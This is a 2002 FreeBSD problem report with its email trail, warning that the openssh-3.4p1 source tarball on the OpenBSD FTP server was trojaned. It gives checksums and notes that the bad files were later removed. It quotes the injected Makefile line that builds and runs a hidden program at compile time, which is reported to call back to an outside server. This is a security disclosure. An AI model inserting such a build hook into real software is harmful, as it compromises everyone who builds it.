From edwin@mavetju.org  Thu Aug  1 00:02:38 2002
Return-Path: <edwin@mavetju.org>
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP
	id DE96237B401; Thu,  1 Aug 2002 00:02:36 -0700 (PDT)
Received: from topaz.mdcc.cx (topaz.mdcc.cx [212.204.230.141])
	by mx1.FreeBSD.org (Postfix) with ESMTP
	id 8032A43E75; Thu,  1 Aug 2002 00:02:36 -0700 (PDT)
	(envelope-from edwin@mavetju.org)
Received: from k7.mavetju (topaz.mdcc.cx [212.204.230.141])
	by topaz.mdcc.cx (Postfix) with ESMTP
	id 7956D2B6E5; Thu,  1 Aug 2002 09:02:33 +0200 (CEST)
Received: by k7.mavetju (Postfix, from userid 1001)
	id 01DE86A711E; Thu,  1 Aug 2002 17:02:26 +1000 (EST)
Message-Id: <20020801070226.01DE86A711E@k7.mavetju>
Date: Thu,  1 Aug 2002 17:02:26 +1000 (EST)
From: Edwin Groothuis <edwin@mavetju.org>
Reply-To: Edwin Groothuis <edwin@mavetju.org>
To: FreeBSD-gnats-submit@freebsd.org
Cc: security-officer@freebsd.org, dinoex@FreeBSD.org
Subject: openssh-3.4p1.tar.gz trojaned
X-Send-Pr-Version: 3.113
X-GNATS-Notify:

>Number:         41225
>Category:       ports
>Synopsis:       openssh-3.4p1.tar.gz trojaned
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    dinoex
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Thu Aug 01 00:10:01 PDT 2002
>Closed-Date:    Mon Aug 05 20:28:54 PDT 2002
>Last-Modified:  Mon Aug 05 20:28:54 PDT 2002
>Originator:     Edwin Groothuis
>Release:        FreeBSD 4.5-RELEASE i386
>Organization:
-
>Environment:
System: FreeBSD k7.mavetju 4.5-RELEASE FreeBSD 4.5-RELEASE #3: Mon Mar 11 13:32:05 EST 2002 edwin@k7.mavetju.org:/usr/src/sys/compile/k7 i386

>Description:

    Do *NOT* update the md5 checksum on openssh-3.4p1.
    The file on ftp.openbsd.org is trojaned.

>How-To-Repeat:

>Fix:
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-ports->dinoex 
Responsible-Changed-By: ijliao 
Responsible-Changed-When: Thu Aug 1 00:39:44 PDT 2002 
Responsible-Changed-Why:  
over to maintainer 

http://www.freebsd.org/cgi/query-pr.cgi?pr=41225 

From: Edwin Groothuis <edwin@mavetju.org>
To: FreeBSD-gnats-submit@FreeBSD.org, security-officer@FreeBSD.org,
	dinoex@FreeBSD.org
Cc:  
Subject: Re: ports/41225: openssh-3.4p1.tar.gz trojaned
Date: Thu, 1 Aug 2002 17:46:15 +1000

 Date: Thu, 1 Aug 2002 16:55:51 +1000
 From: Edwin Groothuis <edwin@mavetju.org>
 To: incidents@securityfocus.com
 Subject: openssh-3.4p1.tar.gz trojaned
 
 Greetings,
 
 Just want to inform you that the OpenSSH package op ftp.openbsd.org
 (and probably all its mirrors now) it trojaned:
 
 ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
 
 The OpenBSD people have been informed about it (via email to
 deraadt@openbsd.org and via irc.openprojects.org/#openbsd)
 
 
 The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
  all: libopenbsd-compat.a
 +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
 
 bf-test.c[1] is nothing more than a wrapper which generates a
 shell-script[2] which compiles itself and tries to connect to an
 server running on 203.62.158.32:6667 (web.snsonline.net).
        
 [1] http://www.mavetju.org/~edwin/bf-test.c
 [2] http://www.mavetju.org/~edwin/bf-output.sh
 
 This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
 ports system:
 	MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
 
 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
 	MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
 
 Edwin
 
 
State-Changed-From-To: open->closed 
State-Changed-By: dinoex 
State-Changed-When: Mon Aug 5 20:27:53 PDT 2002 
State-Changed-Why:  
trojaned binarys have been removed, Thanks for the addditional Info. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=41225 
>Unformatted:
